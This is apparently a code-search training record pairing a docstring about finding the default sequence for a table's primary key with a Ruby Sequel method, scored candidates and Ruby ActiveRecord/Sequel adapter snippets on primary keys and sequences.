WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def to_param\n self.primary_key\n end",
"def primary_key_type\n \"integer PRIMARY KEY\"\n end",
"def pk(ta, h)\n x = primary_keys[ta]\n if x.is_a?(Array)\n unless x == []\n x = x.map{|ca| h[ca]}\n x if x.all?\n end\n else\n h[x]\n end\n end",
"def key\n stores_foreign_key? ? foreign_key : primary_key\n end",
"def primary_key=(value)\n @primary_key = value && value.to_s\n @quoted_primary_key = nil\n end",
"def primary_key_value\n send(self.class.primary_key)\n end",
"def has_primary_key(db, table, key)\n return db.primary_key(table) == key.to_s if db.respond_to?(:primary_key)\n\n pk_column_info = db.schema(table).find { |column_info| column_info[0] == key }\n return false if pk_column_info.nil?\n\n pk_column_info[1][:primary_key] == true\nend",
"def pk_field(klass)\n pk = klass.primary_key\n return klass.ann(pk, :field) || pk\n end",
"def primary_key\n unless @primary_key\n pk_column_names = Set.new( primary_key_columns.collect { |c| c.name } )\n unique_indexes = indexes.values.find_all { |i| i.unique? }\n\n pk_result = []\n\n unique_indexes.each do |idx|\n idx_column_names = Set.new( idx.columns.collect { |c| c.name } )\n r = idx_column_names ^ pk_column_names\n if r.size == 0 then\n pk_result = idx.columns\n break\n end\n end\n\n # no joy, see about just using all the columns that say the are primary\n # keys\n if pk_result.empty? then\n pk_result = self.primary_key_columns\n end\n @primary_key = pk_result\n end\n return @primary_key\n end",
"def relation_primary_key(relation)\n relation_reflect(relation).association_primary_key\n end",
"def association_primary_key(klass = nil)\n options[:primary_key] || primary_key(klass || self.klass)\n end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def pk\n raise(Error, \"No primary key is associated with this model\") unless key = primary_key\n case key\n when Array\n key.collect{|k| @values[k]}\n else\n @values[key]\n end\n end",
"def primary_keys(field)\n sql = \"SELECT #{field.primary_key_col} from #{field.table} \"\n sql += \"#{where_and(sql)} #{field.column} IS NOT NULL \" if field.leave_null\n field.where&.each_pair do |column, value|\n sql += \"#{where_and(sql)} #{column} = #{value} \"\n end\n sql += \"ORDER BY #{field.primary_key_col};\"\n execute(sql).split(\"\\n\")\nend",
"def primary_key\n self[:primary_key] ||= self[:model].primary_key\n end",
"def pk_and_sequence_for(table_name, owner = nil, desc_table_name = nil) # :nodoc:\n (owner, desc_table_name) = @raw_connection.describe(table_name)\n\n seqs = select_values_forcing_binds(<<~SQL.squish, \"SCHEMA\", [bind_string(\"owner\", owner), bind_string(\"sequence_name\", default_sequence_name(desc_table_name))])\n select us.sequence_name\n from all_sequences us\n where us.sequence_owner = :owner\n and us.sequence_name = upper(:sequence_name)\n SQL\n\n # changed back from user_constraints to all_constraints for consistency\n pks = select_values_forcing_binds(<<~SQL.squish, \"SCHEMA\", [bind_string(\"owner\", owner), bind_string(\"table_name\", desc_table_name)])\n SELECT cc.column_name\n FROM all_constraints c, all_cons_columns cc\n WHERE c.owner = :owner\n AND c.table_name = :table_name\n AND c.constraint_type = 'P'\n AND cc.owner = c.owner\n AND cc.constraint_name = c.constraint_name\n SQL\n\n warn <<~WARNING if pks.count > 1\n WARNING: Active Record does not support composite primary key.\n\n #{table_name} has composite primary key. Composite primary key is ignored.\n WARNING\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first),\n oracle_downcase(seqs.first)] : nil\n end",
"def pk_from_insert_sql(sql)\n sql[/into\\s+([^\\(]*).*values\\s*\\(/i]\n primary_key($1.strip) if $1\n end",
"def pk_from_insert_sql(sql)\n sql[/into\\s+([^\\(]*).*values\\s*\\(/i]\n primary_key($1.strip) if $1\n end",
"def primary_key\n @resource_options.fetch :primary_key, :\"#{singular_resource_name}_id\"\n end",
"def primary_key_constraint_sql_fragment(_)\n 'PRIMARY KEY'\n end",
"def insert_pk\n (f = opts[:from]) && !f.empty? && (t = f.first)\n case t\n when Symbol, String, SQL::Identifier, SQL::QualifiedIdentifier\n if pk = db.primary_key(t)\n Sequel::SQL::Identifier.new(pk)\n end\n end\n end",
"def primary_key\n fail NotImplementedError\n end",
"def primary_key?\n schema && schema[:primary_key]\n end",
"def qualified_primary_key\n cached_fetch(:qualified_primary_key){qualify_cur(primary_key)}\n end",
"def pk_hash\n model.primary_key_hash(pk)\n end",
"def hash_key\n read_attribute(table_hash_key)\n end",
"def primary_key_for(entity_name)\n metadata.xpath(\"//EntityType[@Name='#{entity_name}']/Key/PropertyRef\").first.attributes['Name'].value\n end",
"def default_primary_key\n model_name.foreign_key.to_s\n end",
"def extract_key(row)\n row.reject {|column, value| not primary_key_names.include? column }\n end",
"def primary_key\n self[:primary_key] ||= associated_class.primary_key\n end",
"def default_sequence_name(table_name, pri_key = nil)\n serial_sequence(table_name, pri_key || 'id').split('.').last\n rescue ActiveRecord::StatementInvalid\n \"#{table_name}_#{pri_key || 'id'}_seq\"\n end",
"def key(*fields)\n @primary_key = fields\n before_save :generate_key\n end"
] |
[
"0.8734996",
"0.8696134",
"0.85477465",
"0.8429715",
"0.8329904",
"0.83237815",
"0.8244794",
"0.8160607",
"0.7980489",
"0.7939842",
"0.7795205",
"0.7681589",
"0.76727057",
"0.7614512",
"0.75594294",
"0.7505976",
"0.74860096",
"0.7477005",
"0.7477005",
"0.7330574",
"0.7314233",
"0.72782254",
"0.720774",
"0.7170536",
"0.713582",
"0.7107255",
"0.70642257",
"0.705703",
"0.70305926",
"0.7015378",
"0.7015378",
"0.7015378",
"0.6949703",
"0.69369996",
"0.6927526",
"0.68937725",
"0.68385226",
"0.68385226",
"0.6824395",
"0.6816049",
"0.6812834",
"0.6800493",
"0.6786482",
"0.6773304",
"0.6734834",
"0.66945356",
"0.6653895",
"0.66014385",
"0.6580018",
"0.6580018",
"0.6552553",
"0.65245634",
"0.64966476",
"0.64776015",
"0.64618117",
"0.63613737",
"0.63526744",
"0.63279593",
"0.6310563",
"0.6310308",
"0.630781",
"0.6278599",
"0.62698853",
"0.6264069",
"0.62600964",
"0.62027574",
"0.61785144",
"0.6176011",
"0.6172968",
"0.6170658",
"0.6153318",
"0.6145228",
"0.6130355",
"0.6116704",
"0.6106912",
"0.6076497",
"0.6073204",
"0.60671175",
"0.6051506",
"0.6025944",
"0.60167354",
"0.6002494",
"0.5986534",
"0.59452343",
"0.5937026",
"0.5937026",
"0.5935474",
"0.5928869",
"0.591482",
"0.5913494",
"0.5911433",
"0.59062326",
"0.5904206",
"0.5881851",
"0.5848011",
"0.5844895",
"0.5831418",
"0.5829109",
"0.5822482",
"0.5816137"
] |
0.80371535
|
8
|
Return the sequence providing the default for the primary key for the given table.
|
def primary_key_sequence(table, opts=OPTS)
quoted_table = quote_schema_table(table)
Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}
cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}
value = if pks = _select_serial_sequence_ds.first(cond)
literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))
elsif pks = _select_custom_sequence_ds.first(cond)
literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))
end
Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n default_pk, default_seq = pk_and_sequence_for(table_name)\n default_seq || \"#{table_name}_#{pk || default_pk || 'id'}_seq\"\n end",
"def default_sequence_name(table_name, pri_key = nil)\n serial_sequence(table_name, pri_key || 'id').split('.').last\n rescue ActiveRecord::StatementInvalid\n \"#{table_name}_#{pri_key || 'id'}_seq\"\n end",
"def default_sequence_name(table_name, column = nil)\n pk, seq = pk_and_sequence_for(table_name)\n if column && (pk != column)\n # Is this ever actually called with a non-pk column?\n nil\n else\n seq\n end\n rescue\n nil\n end",
"def default_sequence_name(table_name, pk = \"id\")\n nil\n end",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def default_sequence_name(table, _column)\n \"#{table}_seq\"\n end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n result = serial_sequence(table_name, pk || 'id')\n return nil unless result\n Utils.extract_schema_qualified_name(result).to_s\n rescue ActiveRecord::StatementInvalid\n Redshift::Name.new(nil, \"#{table_name}_#{pk || 'id'}_seq\").to_s\n end",
"def primary_key(table_name)\n pk_and_sequence_for(table_name)[0]\n rescue\n nil\n end",
"def primary_key(table)\n pk_and_sequence = pk_and_sequence_for(table)\n pk_and_sequence && pk_and_sequence.first\n end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def primary_key(table_name)\n pk_and_sequence = pk_and_sequence_for(table_name)\n pk_and_sequence && pk_and_sequence.first\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk && sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n\n pk ||= default_pk\n sequence ||= default_sequence\n end\n\n if @logger && pk && !sequence\n @logger.warn \"#{table} has primary key #{pk} with no default sequence.\"\n end\n\n if pk && sequence\n quoted_sequence = quote_table_name(sequence)\n max_pk = query_value(\"SELECT MAX(#{quote_column_name pk}) FROM #{quote_table_name(table)}\", \"SCHEMA\")\n if max_pk.nil?\n if postgresql_version >= 100000\n minvalue = query_value(\"SELECT seqmin FROM pg_sequence WHERE seqrelid = #{quote(quoted_sequence)}::regclass\", \"SCHEMA\")\n else\n minvalue = query_value(\"SELECT min_value FROM #{quoted_sequence}\", \"SCHEMA\")\n end\n end\n if max_pk\n # NOTE(joey): This is done to replace the call:\n #\n # SELECT setval(..., max_pk, false)\n #\n # with\n #\n # SELECT setval(..., max_pk-1)\n #\n # These two statements are semantically equivilant, but\n # setval(string, int, bool) is not supported by CockroachDB.\n #\n # FIXME(joey): This is incorrect if the sequence is not 1\n # incremented. We would need to pull out the custom increment value.\n max_pk - 1\n end\n query_value(\"SELECT setval(#{quote(quoted_sequence)}, #{max_pk ? max_pk : minvalue})\", \"SCHEMA\")\n end\n end",
"def reset_primary_key_sequence(table)\n return unless seq = primary_key_sequence(table)\n pk = SQL::Identifier.new(primary_key(table))\n db = self\n s, t = schema_and_table(table)\n table = Sequel.qualify(s, t) if s\n\n if server_version >= 100000\n seq_ds = metadata_dataset.from(:pg_sequence).where(:seqrelid=>regclass_oid(LiteralString.new(seq)))\n increment_by = :seqincrement\n min_value = :seqmin\n # :nocov:\n else\n seq_ds = metadata_dataset.from(LiteralString.new(seq))\n increment_by = :increment_by\n min_value = :min_value\n # :nocov:\n end\n\n get{setval(seq, db[table].select(coalesce(max(pk)+seq_ds.select(increment_by), seq_ds.select(min_value))), false)}\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def reset_pk_sequence!(table_name, primary_key=nil, sequence_name=nil)\n primary_key, seq_schema, sequence_name = pk_and_sequence_for(table_name, true)\n if primary_key && !sequence_name\n @logger.warn \"#{table_name} has primary key #{primary_key} with no sequence\" if @logger\n end\n\n if primary_key && sequence_name\n seq_from_where = \"FROM information_schema.sequences \"+\n \"WHERE sequence_schema='#{quote_string(seq_schema)}' \"+\n \"AND sequence_name='#{quote_string(sequence_name)}'\"\n result = select_rows(\n \"SELECT COALESCE(MAX(#{quote_column_name(primary_key)} + (SELECT increment #{seq_from_where})), \"+\n \" (SELECT minimum_value #{seq_from_where})) \"+\n \"FROM #{quote_table_name(table_name)}\",\n SCHEMA_LOG_NAME\n )\n\n if result.length == 1\n # The COMMIT; BEGIN; can go away when 1) transactional DDL is available 2) There is a better restart/set function\n execute(\n \"COMMIT; \"+\n \"CALL sys.alter_seq_restart('#{quote_string(seq_schema)}', '#{quote_string(sequence_name)}', #{result[0][0]}); \"+\n \"BEGIN;\",\n SCHEMA_LOG_NAME\n )\n else\n @logger.warn \"Unable to determin max value for #{table_name}.#{primary_key}\" if @logger\n end\n end\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil)\n if ! pk || ! sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk; sequence ||= default_sequence\n end\n if pk && sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset Sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n end\n end",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def pk_and_sequence_for(table_name)\n (owner, table_name) = @connection.describe(table_name)\n\n # RSI: changed select from all_constraints to user_constraints - much faster in large data dictionaries\n pks = select_values(<<-SQL, 'Primary Key')\n select cc.column_name\n from user_constraints c, user_cons_columns cc\n where c.owner = '#{owner}'\n and c.table_name = '#{table_name}'\n and c.constraint_type = 'P'\n and cc.owner = c.owner\n and cc.constraint_name = c.constraint_name\n SQL\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first), nil] : nil\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def default_sequence_name(table, column)\n @logger.unknown(\"ODBCAdapter#default_sequence_name>\") if @trace\n @logger.unknown(\"args=[#{table}|#{column}]\") if @trace\n get_autounique_column(table)\n end",
"def last_insert_id(table, sequence_name) #:nodoc:\n Integer(select_value(\"SELECT currval('#{sequence_name}')\"))\n end",
"def pk_and_sequence_for(table_name, with_seq_schema = false)\n result = select_rows(\n \"SELECT kc.column_name, \"+\n (with_seq_schema ? \"c.sequence_schema, \" : \"\") +\n \" c.sequence_name \"+\n \"FROM information_schema.table_constraints tc \"+\n \"INNER JOIN information_schema.key_column_usage kc \"+\n \" ON tc.table_schema = kc.table_schema \"+\n \" AND tc.table_name = kc.table_name \"+\n \" AND tc.constraint_name = kc.constraint_name \"+\n \"LEFT JOIN information_schema.columns c \"+\n \" ON kc.table_schema = c.table_schema \"+\n \" AND kc.table_name = c.table_name \"+\n \" AND kc.column_name = c.column_name \"+\n \"WHERE tc.table_schema = CURRENT_SCHEMA \"+\n \" AND tc.table_name = '#{table_name}' \"+\n \" AND tc.constraint_type = 'PRIMARY KEY'\",\n SCHEMA_LOG_NAME\n )\n (result.length == 1) ? result[0] : nil\n rescue\n nil\n end",
"def primary_key table\n return nil unless table\n table = self[table]\n pk = table.column_names.find{ |c| table[c].primary_key? }\n end",
"def default_primary_key\n model_name.foreign_key.to_s\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def last_insert_id(table, sequence_name) #:nodoc:\n identity = select_value(\"SELECT scope_identity()\")\n if identity.class == System::DBNull\n nil\n else\n System::Convert.to_int32(identity)\n end\n end",
"def reset_sequence!(table, column, sequence = nil)\n max_id = select_value(\"select max(#{column}) from #{table}\")\n execute(\"alter sequence #{default_sequence_name(table, column)} restart with #{max_id}\") unless legacy_mode\n execute(\"SET GENERATOR #{default_sequence_name(table, column)} TO #{max_id}\") if legacy_mode\n end",
"def getNextSequence(table,db)\n\t\tif db[table].count == 0\n\t\t\treturn 1\n\t\telse\n\t\t\tdb[table].find().sort(_id: -1).limit(1).each do |document|\n\t\t\t\treturn document[:_id]+1\n\t\t\tend\n\t\tend\n\tend",
"def set_sequence(table_name, pk)\n begin\n stmt = @connection.run(\"select max(#{pk}) + 1 from #{table_name}\")\n next_pk_val = stmt.fetch\n stmt.drop\n flds = table_name.split('.')\n @connection.do(\"sequence_set('#{flds[0]}.#{flds[1]}.#{table_name}.#{pk}', #{next_pk_val}, 0)\")\n return true\n rescue Exception => e\n @logger.unknown(\"exception=#{e}\") if @trace\n end\n return false\n end",
"def uses_sequence\n select_value(\"SELECT name FROM sqlite_master WHERE type='table' AND name='sqlite_sequence';\")\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key(table_name)\n # TODO: Change this to be a pure mongo lookup by digging into document definitions\n # TODO: Manage _id and id\n id_definition = Mongo::DocumentDefinition.fields_for(table_name).find { |_, field_definition| field_definition['primary_key'] }\n Array(id_definition).first # && id_definition.first || '_id'\n end",
"def primary_key\n @primary_key ||= :id\n end",
"def primary_key_name\n @primary_key_name ||= @connection.schema[@table_name.to_s][:primary_key]\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def find_primary_key_by_table(table_name)\n @opts[:primary_key].values_at(table_name).first\n end",
"def reset_sequence!(table, column, sequence = nil)\n sequence ||= default_sequence_name(table, column)\n max_id = select_value(\"select max(#{column}) from #{table}\")\n execute(\"alter sequence #{sequence} restart with #{max_id}\")\n end",
"def primary_key(_table_name)\n []\n end",
"def primary_key(table)\n t = dataset.send(:input_identifier, table)\n @primary_keys.fetch(t) do\n pk = fetch(\"SELECT RDB$FIELD_NAME FROM RDB$INDEX_SEGMENTS NATURAL JOIN RDB$RELATION_CONSTRAINTS WHERE RDB$CONSTRAINT_TYPE = 'PRIMARY KEY' AND RDB$RELATION_NAME = ?\", t).single_value\n @primary_keys[t] = dataset.send(:output_identifier, pk.rstrip) if pk\n end\n end",
"def pkey\n table = self.class.table_name\n key = get_primary_key_values.first\n return key\n end",
"def next_sequence_value(sequence_name)\n select_one(\"select #{sequence_name}.nextval id from dual\")['id']\n end",
"def key\n get_primary_key_value_map[self.class.table_name]\n end",
"def primary_key(table_name) #:nodoc:\r\n sql = \"SELECT COLUMN_NAME FROM (EXECUTE PROCEDURE sp_GetBestRowIdentifier( NULL, NULL, '#{table_name}', NULL, FALSE)) as gbri\"\r\n rs = select(sql)\r\n if !rs.nil? and !rs[0].nil?\r\n strip_or_self(rs[0]['COLUMN_NAME'])\r\n else\r\n nil\r\n end\r\n end",
"def primary_key(value=nil)\n self.primary_key = value unless value.nil?\n \n @primary_key ||= :id\n end",
"def next_sequence_value(sequence_name)\n # if sequence_name is set to :autogenerated then it means that primary key will be populated by trigger\n raise ArgumentError.new \"Trigger based primary key is not supported\" if sequence_name == AUTOGENERATED_SEQUENCE_NAME\n # call directly connection method to avoid prepared statement which causes fetching of next sequence value twice\n select_value(<<~SQL.squish, \"SCHEMA\")\n SELECT #{quote_table_name(sequence_name)}.NEXTVAL FROM dual\n SQL\n end",
"def reset_sequence!(table, column, sequence = nil)\n # Do nothing by default. Implement for PostgreSQL, Oracle, ...\n end",
"def reset_sequence_numbers\n result = Database.connection.exec(\"SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';\")\n table_names = result.map { |row| row.values_at('table_name')[0] }\n\n table_names_with_id_column = table_names.select do |table_name|\n result = Database.connection.exec(\"SELECT column_name FROM information_schema.columns WHERE table_name = '#{table_name}';\")\n column_names = result.map { |row| row.values_at('column_name')[0] }\n column_names.include?('id')\n end\n\n table_names_with_id_column.each do |table_name|\n result = Database.connection.exec(\"SELECT pg_get_serial_sequence('#{table_name}', 'id');\")\n sequence_name = result.getvalue(0, 0)\n Database.connection.exec(\"SELECT setval('#{sequence_name}', (select MAX(id) from #{table_name}));\")\n end\n end",
"def generate_primary_key\n self[self.class.primary_key] ||= self.class.new_primary_key(10_000)\n end",
"def reset_id_seq *tables\n tables.each do |table|\n sql \"SELECT setval('#{table}_id_seq',max(id)) FROM #{table}\"\n end\n end",
"def primary_key(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n value = _select_pk_ds.where_single_value(Sequel[:pg_class][:oid] => regclass_oid(table, opts))\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def sequence_values(rep_prefix, table_name)\n # check if the table has an auto_increment column, return if not\n sequence_row = select_one(<<-end_sql)\n show columns from `#{table_name}` where extra = 'auto_increment'\n end_sql\n return {} unless sequence_row\n column_name = sequence_row['Field']\n\n # check if the sequences table exists, create if necessary\n sequence_table_name = \"#{rep_prefix}_sequences\"\n unless tables.include?(sequence_table_name)\n create_table \"#{sequence_table_name}\".to_sym,\n :id => false, :options => 'ENGINE=MyISAM' do |t|\n t.column :name, :string\n t.column :current_value, :integer\n t.column :increment, :integer\n t.column :offset, :integer\n end\n ActiveRecord::Base.connection.execute(<<-end_sql) rescue nil\n ALTER TABLE \"#{sequence_table_name}\"\n ADD CONSTRAINT #{sequence_table_name}_pkey\n PRIMARY KEY (name)\n end_sql\n end\n\n sequence_row = select_one(\"select current_value, increment, offset from #{sequence_table_name} where name = '#{table_name}'\")\n if sequence_row == nil\n current_max = select_one(<<-end_sql)['current_max'].to_i\n select max(`#{column_name}`) as current_max from `#{table_name}`\n end_sql\n return {column_name => {\n :increment => 1,\n :value => current_max\n }\n }\n else\n return {column_name => {\n :increment => sequence_row['increment'].to_i,\n :value => sequence_row['offset'].to_i\n }\n }\n end\n end",
"def pk_and_sequence_for(table_name, owner = nil, desc_table_name = nil) # :nodoc:\n (owner, desc_table_name) = @raw_connection.describe(table_name)\n\n seqs = select_values_forcing_binds(<<~SQL.squish, \"SCHEMA\", [bind_string(\"owner\", owner), bind_string(\"sequence_name\", default_sequence_name(desc_table_name))])\n select us.sequence_name\n from all_sequences us\n where us.sequence_owner = :owner\n and us.sequence_name = upper(:sequence_name)\n SQL\n\n # changed back from user_constraints to all_constraints for consistency\n pks = select_values_forcing_binds(<<~SQL.squish, \"SCHEMA\", [bind_string(\"owner\", owner), bind_string(\"table_name\", desc_table_name)])\n SELECT cc.column_name\n FROM all_constraints c, all_cons_columns cc\n WHERE c.owner = :owner\n AND c.table_name = :table_name\n AND c.constraint_type = 'P'\n AND cc.owner = c.owner\n AND cc.constraint_name = c.constraint_name\n SQL\n\n warn <<~WARNING if pks.count > 1\n WARNING: Active Record does not support composite primary key.\n\n #{table_name} has composite primary key. Composite primary key is ignored.\n WARNING\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first),\n oracle_downcase(seqs.first)] : nil\n end",
"def reset_sequence!(table, column, sequence = nil)\n mpk = select_value(\"SELECT MAX(#{quote_column_name(column)}) FROM #{quote_table_name(table)}\")\n execute(\"ALTER TABLE #{quote_table_name(table)} ALTER COLUMN #{quote_column_name(column)} RESTART WITH #{mpk.to_i + 1}\")\n end",
"def property_schema_statement(schema)\n statement = super\n\n if schema.has_key?(:sequence_name)\n statement << \" DEFAULT nextval('#{schema[:sequence_name]}') NOT NULL\"\n end\n\n statement\n end",
"def next_sequence_id\n last_sequence_id + 1\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def association_primary_key(klass = nil)\n active_record.primary_key\n end",
"def primary_key\n @primary_key ||= @klass.primary_key.to_s\n end",
